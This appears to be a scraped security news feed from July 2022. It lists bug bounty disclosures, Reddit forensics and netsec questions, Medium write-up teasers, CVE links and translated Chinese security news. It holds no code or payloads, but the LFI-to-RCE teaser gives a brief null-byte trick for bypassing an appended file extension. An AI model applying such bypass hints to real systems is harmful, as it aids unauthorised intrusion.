    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-33980 Comments URL: https://news.ycombinator.com/item?id=32024034 Points: 2 # Comments: 0
  • Open

    "Password protection" in Azure
    Hi there. Can someone explain how password protection in Azure works? As I understand it bans a variety of one word, for example, if users like to use passwords like qwerty123!, 123qwerty%, qwertyyy4636, etc. I can ban them by the word "qwerty", yes? If there are such passwords: Qwer1234!@#$ Q!w2e3r4t5 Qwedcxzas4 And to ban them, I can use only the one word qwerty? Or do I need to use a separate word for each one? Qwer1234!@#$ -> qwer Q!w2e3r4t5 -> qwert (or no?) Qwedcxzas4 -> qwedcxzas submitted by /u/athanielx [link] [comments]

    Clickjacking Vulnerability In Whole Page Ads Tiktok
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1418857 - Bounty: $500
    HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524555
    HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524692
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1501679
    Brute force of a current password on a disable 2fa leads to guess password and disable 2fa.
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1465277
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1604951 - Bounty: $1500
    Stack Buffer Overflow via `gmp_sprintf` in `BLSSignature` and `BLSSigShare`
    SKALE Network disclosed a bug submitted by voiddy: https://hackerone.com/reports/1546935 - Bounty: $2500

    Laptop HP Forensic Image
    Hello, I wanted to see if anyone could help me out. I have an old laptop that I want to mess with, so I can learn how to create an image of it. How can I extract an image from my HP laptop, what forensic tools can I use? Any YouTube videos or websites that show a step by step how to do this? Thanks in advance! submitted by /u/Sudden_Ad9859 [link] [comments]
    Odd FTK Imager behavior
    Got a micro SD card from dash cam to analyze. In Windows Explorer, via write blocker, the card looks formatted by Android with typical folders you would see if used in a phone. In FTK Imager, I see the folders and subfolders for the dash cam. Found hundreds of videos. A month later, I open FTK Imager, same version, and view the card again, only this time I only get the Android data. I cannot locate the dash cam folders or videos. I have rolled back to earlier versions of FTK Imager and tried Windows 11, 10, and 7. Has anyone ever experienced something like this before or possibly have any recommendations for next steps to try. Thanks in advance. submitted by /u/rgc_71 [link] [comments]
    Evtx Rules
    Hello everyone, Hope you all had a great holiday. I have the following situation pulled from an .EVTX log, and I am wondering if there is a log or file that tells me what "specific words" rule was deleted please. "Microsoft Outlook Delete rule "Delete messages with specific words"? submitted by /u/clarkwgriswoldjr [link] [comments]
    A DIY Windows forensics challenge
    Hi all, I thought this is helpful for anyone wanting to get their hands on a Windows system with realistic attack patterns to perform a forensic analysis on it. I've published a GitHub repo that includes a script, based on AtomicRedTeam, which will run a few selected atomic techniques that are great for beginner and medium experienced analysts to practice forensics. You can completely run it on your own lab / Windows system (e.g. trial version). I published this as part of a course that is nowadays available on The Cyber Mentor Academy for cheap (full disclaimer!), however, there's no need for the course to get this going. It's a way to provide students with the opportunity to create their own forensic evidence and practice the full forensic process, which I wish was around when I started learning this. Practical Windows Forensics GitHub repo: https://github.com/bluecapesecurity/PWF Hope this is helpful for people! submitted by /u/masch_aut [link] [comments]
    iOS Synced Data Metadata/Artefacts:
    Let’s assume we are examining a file system extraction of an iPhone; is there a way to tell which data on the device was synced onto the device? e.g. if we narrowed down to iMessages would there be a database/PLIST file which contains that info? submitted by /u/1-bitbybit-0 [link] [comments]

    Mostly Linux-related stuff but contains stuff like Samsung smart view and his cpuinfo output
    submitted by /u/themariocrafter [link] [comments]

    How to find information disclosure bugs (:
    Hello 👋 people of the internet, so this is my first writeup; I hope I don't suck that much. Continue reading on Medium »
    PII Disclosure of Apple Users ($10k)
    How I hacked Apple and was able to Disclose Apple Users Private Shipping Information and Mobile Numbers. Continue reading on Medium »
    Awesome Bug Bounty Tools
    Continue reading on Medium »

    Koh: The Token Stealer
    Years ago I was chatting with a few experienced red teamers and one was lamenting token abuse. Specifically, they wanted to be able to… Continue reading on Posts By SpecterOps Team Members »
    Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detection
    Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the… Continue reading on Medium »

    War in Ukraine / July 6
    Britain without Johnson. What does this mean for Ukraine? Continue reading on Medium »
    “Mastering Cyber Intelligence” Notes
    Mastering Cyber Intelligence by Jean Nestor M. Dahj is the best cyber threat intel book I’ve read so far. It’s comprehensive and detailed… Continue reading on Medium »
    Tracking a Person Using OSINT
    Wondering how tech detectives track people using Open Source Intelligence and some Digital Forensics skills? Today I am gonna show a basic… Continue reading on Medium »
    Some ways to enumerate what a target has
    While exploiting, you have to know what the target has and how far its scope extends, because we are on the outside exploiting inward, the… Continue reading on Medium »

    Altiris Methods for Lateral Movement
    submitted by /u/dmchell [link] [comments]

    Does anyone have any idea what this is?
    For the past 10 days or so, my friend has been receiving a lot of spam emails such as this one. Written in some sort of a code. Does anyone know how to decipher it? And what it is? https://cdn.discordapp.com/attachments/538420241794072579/994635097288491068/Screenshot_2022-07-07-18-04-38-23_45e686c594768066ad9911d54d96f72b.jpg submitted by /u/Kolur96 [link] [comments]
    How does Omegle (p2p chat with randos) work without port forwarding?
    From my understanding, two computers can't talk to each other without open ports on either of them. If there is a way to make this work, what's protecting me from becoming part of a botnet by just visiting a website? submitted by /u/GreedyAd9811 [link] [comments]
    InsightVM Scans vs Agents
    Personally I'm new to the InsightVM agents, not the authenticated scanning. The company I'm with chose to deploy the agents so they didn't have to use the privilege elevation in scanning, while still performing non-root-level scans. This was all implemented before I joined the company, but from what I've gathered they were told they didn't need to do elevated privilege scans because they use the agents. There are a lot of complaints of remediating something but InsightVM says it's still an issue, and InsightVM sucks. Essentially they blame InsightVM as a poor product. Having used InsightVM for so many years (I still call it Nexpose), many of these vulnerabilities should be getting caught as remediated but aren't. So is there something wrong with our implementation, or is it because we still need the elevated scans? The way I read the Rapid7 docs is that the agent doesn't replace the scans. Thanks submitted by /u/squirrel_butter [link] [comments]

    SecWiki News 2022-07-07 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki

    Advisory: FESTO: CECC-X-M1 - Command Injection Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Automating binary vulnerability discovery with Ghidra and Semgrep
    submitted by /u/0xdea [link] [comments]

    Apache Commons Configuration insecure interpolation defaults (CVE-2022-33980)
    Article URL: https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s Comments URL: https://news.ycombinator.com/item?id=32014498 Points: 1 # Comments: 0

    Scraping Login Credentials With XSS
    Unauthenticated JavaScript Fun. In prior blog posts I’ve shown the types of weaponized XSS attacks one can perform against authenticated users, using their session to access and exfiltrate data, or perform actions in the application as that user. But what if you only have unauthenticated XSS? Perhaps your client hasn’t provided you with credentials to... The post Scraping Login Credentials With XSS appeared first on TrustedSec.

    FreeBuf Morning Report | Honker Union of China announces disbandment and rename; facial recognition flaws become a tool for fraudsters
    The official Weibo account of the Honker Union of China announced that it is disbanding effective immediately and renaming itself 弘客联盟 (Hongke Alliance).
    User recognition | 斗象科技 (Tophant) selected for the 2022 cybersecurity "Dianping" Top 100 list
    安在 officially released the "2022 China Cybersecurity Product User Survey Report", and 斗象 (Tophant) was selected for the "Dianping" Top 100!
    Why API gateways are not enough to secure APIs: where does the road to API security lead?
    According to Gartner's forecast, by 2023 more than 50% of B2B transactions will move away from traditional methods to real-time APIs.
    Upgraded to Rust, Hive ransomware's encryption will become more complex
    Recently, researchers at Microsoft's security division discovered an upgraded version of the Hive ransomware-as-a-service (RaaS); security experts outlined their findings in a report on Tuesday, in which they set out the following views: with several major upgrades in its latest version, Hive has proven itself to be one of the fastest-evolving ransomware families and an illustration of the ever-changing ransomware ecosystem. According to Microsoft, the upgrades in the latest version of Hive ransomware represent a complete overhaul of the entire ransomware infrastructure; in the report, the experts also pointed out that the most notable change
    FreeBuf Weekly | EU holds ultra-large-scale cybersecurity exercise; PCI DSS 4.0 released to address emerging threats and technologies
    Happy weekend, FreeBufers~ We have summarized and recommended this week's hot news, quality articles and handy tools, so you won't miss any of this week's highlights!
    Marriott International data breached, 20 GB of files stolen
    The Marriott International hotel chain suffered a new data breach, with attackers stealing about 20 GB of files from the company's network.
    A simple traceback analysis of an ongoing email phishing attack: who is doing the phishing?
    Traceback analysis of one ongoing email phishing campaign

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview

    Privilege escalation possible in dovecot when similar passdbs are used
    Open-Xchange disclosed a bug submitted by julezman: https://hackerone.com/reports/1561579 - Bounty: $900
    Ownership check missing when updating or deleting attachments
    Nextcloud disclosed a bug submitted by kesselb: https://hackerone.com/reports/1579820
    Blind User-Agent SQL Injection to Blind Remote OS Command Execution at
    Sony disclosed a bug submitted by echidonut: https://hackerone.com/reports/1339430

    7+3 Vulnerable Apps To Get Started With Android Penetration Testing
    There are currently 3.8 billion smartphone users in the world and this number is doomed to rise in the next years. Continue reading on Medium »
    Exposing Millions of Voter ID card user’s details.
    Critical IDOR disclosing millions of Voter ID card details of Individuals on the official voter ID maintaining platform. Continue reading on Medium »
    YOLO Smart Contracts are Coming to a Blockchain Near You
    Explainer and Community Bounty Continue reading on YOLOrekt »
    OTP Bypass through response manipulation.
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Synthetix Logic Error Bugfix Review
    Summary Continue reading on Immunefi »
    How I found Open redirect on Bug crowd public program in 2 day
    Tools : - Burp suite - Burp JS Link Finder Continue reading on Medium »
    How I Got my first bounty $$
    Hello hackers, Continue reading on Medium »
    Dorks Eye-Google Hacking Dork Scraping and Searching Script
    Dorks Eye is a Python 3-based script. You can easily find Google Dorks using this tool. Dork Eye collects potentially vulnerable web pages… Continue reading on Medium »
    Update your Chrome browser now to avoid a dangerous vulnerability
    Google has released a security update for the Chrome browser that fixes a zero-day vulnerability . This bug affects Windows, Mac and… Continue reading on Medium »
    SSRF web application vulnerability.
    What is an SSRF? Continue reading on Medium »

    Shvanidzor access restriction: an open-source study
    It is early July 2022 and thus still the school holiday season in Armenia. There is little activity around noon in Shvanidzor. The village… Continue reading on Medium »
    OSINT
    OSINT Stands for Open-Source INTelligence Continue reading on Medium »
    War in Ukraine / July 5
    The next big battle is for Sloviansk Continue reading on Medium »
    Open Source Intelligence
    Open Source Intelligence (OSINT) is intelligence collected from publicly available resources. To take a real-life scenario let’s take that… Continue reading on Medium »

    OpenSSL remote code execution vulnerability (CVE-2022-2274)
    OpenSSL version 3.0.4 introduced a serious issue in the RSA implementation for X86_64 CPUs that support the AVX512IFMA instructions. This issue makes the RSA implementation for 2048-bit private keys incorrect on such machines, and during the computation...

    Microsoft Sentinel Automation Tips & Tricks – Part 2: Playbooks
    submitted by /u/SCI_Rusher [link] [comments]

    SecWiki News 2022-07-06 Review
    RSAC2022 interpretation - AI security insights: advancing through adversity by ourren; Designing your security architecture OKRs by ourren; Mimic defense technology explained (core technology) by ourren; Mandiant cyber threat intelligence analyst core competencies framework by ourren; Tetragon -- eBPF-based security observability & runtime enforcement by ourren; Research on the development of integrated land-sea-air-space information networks by ourren; Satellite "hackers" explain "security flaws in satellite communications" by ourren; Cross-security-database entity relationship prediction based on graph attention networks by ourren; Exploiting leaked cloud host AK/SK by ourren; Cross-chain bridges: the battleground Web3 hackers must fight over by ourren; The road to packet capture for WeChat mini-programs by ourren; CS plugin - 梼杌 (Taowu, a red team automation framework based on the Cobalt Strike platform) by ourren; cf: Cloud Exploitation Framework by ourren; For more of the latest articles, visit SecWiki

    Linux Kernel Exploitation Techniques: modprobe_path
    submitted by /u/s4m4k [link] [comments]

    Made a mistake with my workflow. Should I be worried?
    I made a huge security blunder over the last couple weeks... I was running a client-side HTML server that I could access on my localhost (127.0.0.1:5500/index.html) while developing a JavaScript program using VS Code. I was using the VS Code Live Server extension from here https://github.com/ritwickdey/vscode-live-server which exposes port 5500 on my localhost by default. I was doing this while using public wifi for many weeks! I didn't even realize that someone could nmap the LAN and find that my port 5500 was open and they could simply go to my live server directly with their browser. My webapp has a simple X/Y axis chart where I plot some API websocket data. No user input afaik. I used the latest Chrome to run the server and always keep my system updated. No SELinux though. Edited my main question: I'm just assuming the worst case scenario. If the attacker got to my live server, what kind of attacks can they perform on it? Because JavaScript is client-side/browser-based, can they extract any info out of my native system? Edit2: From my cursory research on this topic, the main form of attack from an attacker client is social engineering. For example, inserting a malicious payload into a link and having me click on it to extract information from me. Other than that, exploiting any flaws inside the actual JavaScript itself would be like hacking themselves. The app I was testing was only front end, 100% browser based. No backend server involved at all. u/nuclear_splines's comment helped me understand it better. If I'm wrong feel free to correct me here. submitted by /u/Fuzzht1 [link] [comments]
    How does an attacker know they have gained access to an internal network?
    I've always wanted to know, how does an attacker (launching an attack from the Internet) know when they have breached a network's defenses and gained access to a private / internal network? Would it be as simple as having a GUI or remote desktop configuration and seeing the desktop or GUI of some device on the internal network? Or would an attacker conduct a network / port scan to verify that they're seeing all private IP addresses and use that as evidence that they're on the inside? submitted by /u/Anontrovert [link] [comments]
    Vulnerability Alerting using software inventory
    I'm looking for services that aggregate vendor security alerts, notifications, advisories, etc. Preferably matching alerts with software inventories using a CMDB. If in any way possible (manual) government feeds would be great as well. Anyone familiar with services like these, focused on enterprises? submitted by /u/overworst [link] [comments]
    Has anyone here created an ISAC?
    Has anyone here created an ISAC for their industry / geographical region or whatever? Any tips for someone looking to start one? What model did you use? Did you charge a fee? How did you get people involved? submitted by /u/UnderstandingInfosec [link] [comments]
    Briefly connected to hotel wifi to download a game from Steam and a discord call, should I be worried?
    So I'm currently on vacation and have some down time at our hotel so I decided to try and play some games. I do not have a VPN (I know it's recommended in general but I never wanted to pay for a service and I am a little paranoid of the free ones). I actively wanted to avoid the hotel wifi so I downloaded some games onto my laptop at home on Steam but didn't do the first time startup which would not work without the internet. So I finished doing that and also decided to download another game and then disconnect from the wifi. Again later I was on my phone on a discord call with some friends and thought maybe I should try the wifi to see if the connection is better as I was thinking to myself that I was over paranoid. Well here I am now starting to stress out about it, am I at any risk of important information being stolen? As I said all I did was connect to wifi on my phone for around a minute while on a discord call, and then download stuff from Steam over an hour or so. The hotel wifi is password protected but I do not believe it has wpa2 (not very familiar with network stuff) or anything like that. submitted by /u/mrahma [link] [comments]
    Very long uninstall
    I recently installed an app on my Windows 10 machine that is very graphics intensive. I took a look at it and decided to uninstall. The installer reported an estimated 30 minutes to uninstall the software which made me suspect it was doing something more than uninstalling. I contacted the developer who was very responsive and told me that this was normal. I went ahead with the uninstall which ended up taking over 20 minutes but I also fired up Wireshark and captured a PCAP file during the process. I'm a complete n00b at this point and was wondering if someone might be willing to look at the file for anything nefarious. I'm also curious if there is a legitimate reason that the uninstall should take that long. submitted by /u/Danno_ST [link] [comments]
    How does an IP address get spoofed?
    Is it possible to mask an IP address with another? If so, how? submitted by /u/iExtrapolate314 [link] [comments]

    Optimizing CI/CD Credential Hygiene – A Comparison of CI/CD Solutions
    submitted by /u/TupleType1 [link] [comments]

    Continuous testing, continuous security
    A talk with our Red Team lead, Gabriel Franco Continue reading on Faraday »
    HACKER DOUBLE SUMMER 2022 GUIDES —Part Two: Capture The Flags
    Welcome to the DCG 201 guide to Hacker Double Summer! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »

    [Perks inside] 1-day countdown! CIS Conference Summer Edition about to set sail
    9 a.m. on July 8: see you on the official CIS Conference Summer Edition site!
    FreeBuf Morning Report | NPM supply chain attack affects hundreds of websites; British Army social media accounts hijacked
    British Army social media accounts were hijacked.
    Insight: thoughts on data governance and data security governance
    Data governance is the complete set of management activities in an organization that involve the use of data, including data governance planning, monitoring and implementation.
    Hundreds of websites and programs compromised: the impact of the NPM supply chain attack is incalculable
    Recently, an NPM supply chain attack compromised hundreds of applications and websites.
    New ransomware RedAlert strikes! Windows, Linux and other servers already hit
    A new ransomware called RedAlert is attacking enterprise networks; Windows and Linux VMware ESXi systems have already been hit.
    Hands-on: KMDF-based disk write protection
    This article briefly explains how to implement disk write protection based on KMDF.

    I took the SANS GCFE exam and this wall of text is what happened next
    Who/What/Where/When: 2 weeks yore, I passed the GCFE exam with a score of 91%. I'm a Security Engineer with a (now) 8-pack of certs. This was my 2nd SANS cert after GCIH. I took the exam remotely proctored and found the experience to be much smoother than my experience in the year of 2020 yore. How / 9 Observations: The course handouts were my dear friends during my 3-hours of need. Give them a thorough review before the test and bring those you might find useful with you to the exam. I made a target timetable (tinyurl.com/yckv9jy8) which helped me to keep track of my exam pacing. Had I not had this, I would have inevitably wasted precious neuron cycles calculating my remaining time. This helped to keep me focused and strategize when to spend extra time on questions. I took a more b…

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview

    .NET deserialization vulnerabilities: bypassing SerializationBinder's insecure type binding
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA Overview: When fixing deserialization vulnerabilities in BinaryFormatter, SoapFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter and the like, many .NET applications like to use a custom Se...

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    Article URL: https://blog.assetnote.io/2022/06/26/exploiting-ssrf-in-jira/ Comments URL: https://news.ycombinator.com/item?id=31995638 Points: 1 # Comments: 0

    Microscopes and Optics in General
    submitted by /u/mrcanard [link] [comments]
    pictures of landmines.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of illegally dumped rubbish in Bayview, California.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    All fortnite models with the .blend extension (google drive)
    Chapter 1 models: https://drive.google.com/drive/folders/13XwAQX770Rkb5Qx-XFKYjlyn130OOGjj Chapter 2 models: https://drive.google.com/drive/folders/1L2wa9TMRwdbRjK_FgnX-u2KvBPxDxR_z (credits are in the 'please read' doc) submitted by /u/ethansean0607 [link] [comments]
    Indiana Military history
    http://indianamilitary.org/ATTERBURYAAF/ http://indianamilitary.org/Bakalar%20AFB/ http://indianamilitary.org/Camp%20Atterbury/ http://indianamilitary.org/FtHarrison/ http://indianamilitary.org/WakemanHospital/ http://indianamilitary.org/28TH/ http://indianamilitary.org/30TH/ http://indianamilitary.org/31STINFDIV/ http://indianamilitary.org/83RD/ http://indianamilitary.org/92nd/ http://indianamilitary.org/106ID/ http://indianamilitary.org/CA%20POWs/ http://indianamilitary.org/German%20PW%20Camps/ http://indianamilitary.org/CoD151Ranger/ http://indianamilitary.org/Misc/ http://indianamilitary.org/YANK/ http://indianamilitary.org/StarsStripes/ http://indianamilitary.org/ROSTERs/ Some army manuals, unit history books, and Army published newspapers and magazines. Mostly WW2 material from what I could tell. submitted by /u/c-rn [link] [comments]

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    submitted by /u/Mempodipper [link] [comments]
    From NtObjectManager to PetitPotam
    submitted by /u/onlinereadme [link] [comments]

    Re-architecture of lab environment: workstations vs. server?
    Hey guys, currently I'm tasked to create a draft for our new forensics lab. We use one workstation per case/analyst in our current setup (5 in total). All of them have a fairly big RAID. Our current workloads are mainly analysing triage packages, full images and logs. Once half a year we get a small eDiscovery from our internal compliance department with ~10 GB/case. All of them are from ~2016 with 20 physical cores, 128 GB RAM and two RAIDs for evidence files and case files. Both of them are ~12 TB net. I want to build a "modern lab environment". Goals I try to achieve after the re-architecture: * Hassle-free usage of evidence/images for multiple analysts * A good working environment with less noise pollution * Maintain high performance for CPU-intensive tasks (e.g. Nuix Workstation…
    Recover Bitlocker Drive that has been formatted
    Is it possible to recover data from a "bitlocked" drive that has been formatted with a new windows install? In my mind, even if you could recover the data from the slackspace it would all be garbage unless you run the decryption function on it which I don't think is possible unless you're able to reconstruct enough of the drive to be able to decrypt it with the recovery key. submitted by /u/Tight_Candidate_2293 [link] [comments]
    Google Photo Cache?
    Hello everyone! With Magnet Axiom I find an image inside "com.google.android.apps.photos\cache\glide_cache" at 23:50. What does this mean? That the image was displayed at that time, or was it generated by the system? submitted by /u/Zipper_Ita [link] [comments]

    Bellatrix (VulHub)
    Hello and welcome. I wanted to get a writeup out there on my favorite series and talk of the year , “Harry Potter and the Road to OSCP” ok… Continue reading on Medium »

    How easy is it to create a burner laptop?
    I'm a Joe Schmoe with little infosec knowledge. How feasible would it be for me to purchase a cheap laptop/Chromebook and set it up in a way that my web surfing habits wouldn't be able to be tracked back to me specifically? My personal/work machines are both plugged in to all of my personal accounts already. Would it be enough to just buy a laptop and keep my personal accounts off of it, or would I have to set up a VPN for it/jump through any other hoops? I don't work in a field with sensitive data or anything like that, so it wouldn't have to be locked up airtight. I'm mostly just interested in shrinking my digital footprint and protecting my privacy. Apologies if I'm in the wrong place - just steer me in the right direction if that's the case. Thanks - submitted by /u/Lt_AldoRaine_ [link] [comments]
    Hardening [unsecure] 2-layer Architecture Applications
    Hello /r/AskNetsec Working in Application Security within a legacy-software abundant landscape company, sometimes we come across situations where we are tasked with proposing security requirements and architectural security improvements to applications that are, by-default, unsecure due to their 2-layer architecture. Example: A thick-client application running on users' workstations or VDI that communicates directly with the database instead of having a back-end logic server behind. In these cases, we find it hard to propose meaningful security improvements because the design is flawed by default - however business requirements often don't allow us to demand a full architecture refactor or replacing the solution. For these cases, which would be other areas of improvement that you'd propose in terms of security requirements, architectural tweaks, etc. - so we can have something to show for and improve the security as much as we can given the constraint in place. Thanks! submitted by /u/FabioFreitas [link] [comments]

    SSRF via Office file thumbnails
    Slack disclosed a bug submitted by ziot: https://hackerone.com/reports/671935 - Bounty: $4000
    Exposure of a valid Gitlab-Workhorse JWT leading to various bad things
    GitLab disclosed a bug submitted by ledz1996: https://hackerone.com/reports/1040786 - Bounty: $10000
    Reflected Cross site Scripting (XSS) on https://one.newrelic.com
    New Relic disclosed a bug submitted by sairanga: https://hackerone.com/reports/1367642 - Bounty: $2048
    Reflected XSS on https://wwwapps.ups.com/ctc/request?loc=
    UPS VDP disclosed a bug submitted by 3amoura: https://hackerone.com/reports/1536461

    War in Ukraine / July 4
    Russia continues its offensive in Donbas Continue reading on Medium »
    How to use Creepy Tool for Beginner
    All we have to do is choose the platform-appropriate version and install it. After installing Creepy, the next step is to configure the… Continue reading on Medium »
    Thoughts from an OSINT Newbie…
    For the past few weeks, I have been interested in changing careers to work as an OSINT Investigator. Continue reading on Medium »
    Brand Intelligence: How to use OSINT in an organization
    Hello cybersecurity folks, I know you are skilled at defending your network and other infrastructures from cyber attacks. Yeah, I know you… Continue reading on Medium »
    Top 7 Free Open Source Intelligence Hacking Tools For Beginners
    Open Source Intelligence (OSINT) Continue reading on Medium »
    Collecting information on students, faculty, staff and contractors at UFRN
    Hi everyone, it's been a long time since I wrote an information security article on Medium (I was waiting for something cool… Continue reading on Medium »

    How To Use Foundry To PoC Bug Leads, Part 1
    You’ve probably heard about all of the epic disclosures in the Web3 bug bounty space recently and decided that maybe it’s time to pave… Continue reading on Immunefi »
    Get Rich by Finding Bugs
    These websites will pay you for it Continue reading on Level Up Coding »
    rDEX V2 is Deployed on StaFiHub Testnet with The Bug Bounty Program.
    Continue reading on Medium »
    How I find open redirect in Facebook
    Hi Guys Continue reading on Medium »
    rDEX V2 is Deployed on the StaFiHub Testnet with The Bug Bounty Program
    Overview Continue reading on StaFi »
    How To Get Start Into Bug Bounty By Kidnapshadow
    Hello everyone, After a lot of requests and questions on topics related to Bug Bounty like how to start, how to beat duplicates, what to… Continue reading on Medium »
    XSScope-GUI Framework for XSS Clientside attacks
    The most cutting-edge GUI Framework for XSS Client-side attacks is called XSScope. It is capable of real-time HTML injections and various… Continue reading on Medium »
    LFI TO RCE(PHP WRAPPERS)
    In the following target, we see that the application will always put a .php; now we will have to circumvent this using the code %00 (null byte). Continue reading on Medium »

    SecWiki News 2022-07-05 Review
    Similarity measurement and classification of graph structures by ourren; SecWiki Weekly (Issue 435) by ourren; Analysis report on the activities of overseas NGOs in China (2017-2021) by ourren; US cyber development trends seen through the FY2023 budget by ourren; Cyberspace mapping: just another form of Google by ourren; For more of the latest articles, visit SecWiki

    A Diamond in the Ruff
    This blog post was co-authored with Charlie Clark at Semperis. 1.1 Background of the ‘Diamond’ Attack. One day, while browsing YouTube, we came across an older presentation from Blackhat 2015 by Tal Be’ery and Michael Cherny. In their talk, and subsequent brief, WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING, they outlined something we... The post A Diamond in the Ruff appeared first on TrustedSec.

    When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors
    Penetration testing and adversary emulation tool Brute Ratel C4 is effective at defeating modern detection capabilities – and malicious actors have begun to adopt it. The post When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors appeared first on Unit 42.

    Linear-Time Temporal Logic Guided Greybox Fuzzing
    Article URL: https://github.com/ltlfuzzer/LTL-Fuzzer Comments URL: https://news.ycombinator.com/item?id=31987389 Points: 1 # Comments: 0

    Free webinar on threat hunting with Sigma rules
    submitted by /u/alertnoalert

    FreeBuf Morning Report | NATO to develop rapid cyber response capability; PCI DSS 4.0 released to address emerging threats and technologies
    Global news: 1. IDC: China's cloud workload security market reached US$280 million in 2021. In July 2022 IDC formally released its market share research report on Chinese cloud workload security products, "China Cloud Workload Security Market Share, 2021: Cloud Native and Shift-Left Security Drive Continued Technical Innovation". The Chinese market saw explosive growth in both size and growth rate in 2021, reaching US$280 million, up 57.9% year on year from 2020. [Read original] 2. The World Wide Web Consortium rejects Google and Mozilla on Decentralized Identifiers (
    Adjusting your mindset for cyber attack-defense drills | FreeBuf enterprise community livestream recap
    Preparation for an attack-defense drill means not only inventorying assets, controlling secure access and building defense in depth, but also adjusting your mindset so that you face the exercise positively.
    Serious Chrome zero-day disclosed; Google urges users to update promptly
    Google announced that it has released the Chrome 103.0.5060.114 update for Windows users.
    CISA orders US federal agencies to patch CVE-2022-26925 by July 22
    The US Cybersecurity and Infrastructure Security Agency has again added CVE-2022-26925 to its known vulnerabilities catalog and ordered federal civilian executive branch agencies to remediate it by July 22.
    UK signs agreement to share biometric database with US border guards
    The US side, under the International Biometric Information Sharing (IBIS) program and with the support of the Enhanced Border Security Partnership (EBSP), is calling for new visa requirements.
    [Livestream reservation] Dual livestream rooms in use for the first time | CIS Conference Summer Edition in 5 days
    The "CIS Conference Summer Edition · Summer Live" is about to begin!

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much

    I Released What I Couldn't Write into the Marmara, or the Shoelace in İznik
    If you have started reading this despite such an absurd title, you have a problem with yourself. Continue reading on Medium »

    Is there any way that payments can be handled in a secure way on an HTTP webpage?
    [SOLVED] I am supposed to pay for a transcript and the website wants me to enter payment in an http page with an embedded payment platform. The payment platform appears to use asp, but the webpage it is embedded in is plain html. If I click on the box for the credit card, firefox pops up a message saying that it is not an encrypted webpage and warns me about security. Obviously this sets off multiple red flags telling me that I shouldn't trust that website, but it is an official website (albeit hosted in Korea where apparently security is lax). Is there any chance that this was implemented in a secure way? How could I test it? EDIT: Per the recommendation, I ran a transaction with a bogus number to try and capture the behaviour in wireshark; what I found was that initiating the transaction creates a connection on port 443 and the data seems to be sent there, so I guess it's secure? But I still don't quite trust it so I'll probably be mailing stuff. PS: I cannot share a link because my supervisor works with the people who run the site and they wouldn't want me to send a link. I'm not sure the page is even listed so they might be going for a security through obscurity thing. submitted by /u/LubbyLardo

    Crack the hash Level 2 Write-up (Free Room on TryHackMe) Cracking Salted Hashes
    Introduction Continue reading on Medium »
    What is Burp Suite
    Put simply: Burp Suite is a framework written in Java that aims to provide a one-stop-shop for web application penetration testing. Continue reading on Medium »
    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
    MSA Weekly 2 — How to Install a Virtual Machine and the Nginx Web Server
    With today's technology you can run many different operating systems on a single computer. That way you can create… Continue reading on Medium »
    MSA Weekly 2 — “Tutorial: Installing Nginx on Kali Linux”
    Hi there, this time we will try to learn how to install Nginx on Kali Linux. For those of you who have never… Continue reading on Medium »
    HackTools-The complete Red Team add-on for Web Pentester
    HackTools is a web addon that makes it easier to perform online application penetration testing. It comes with cheat sheets and all the… Continue reading on Medium »
    Continuous Security Project [TR]
    Hello everyone, in this post I will be talking about the project we developed for Continuous Security. Continue reading on Medium »
    XSS Explained
    Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. Continue reading on Medium »
    My first ever Bug Bounty reward!
    Hello guys! Vishnu here. I am back again with yet another interesting article. Well technically, this is not the first bug I discovered,... Continue reading on Medium »

    From Misconfigured Certificate Template to Windows Domain Admin
    submitted by /u/Kondencuotaspienas

    War in Ukraine / July 1–3
    👉 Days of EU Integration in Ukraine’s Parliament Continue reading on Medium »

    SecWiki News 2022-07-04 Review
    No new articles today. For more of the latest articles, visit SecWiki

    Turning a MacBook into a self-hosted GitHub Actions runner
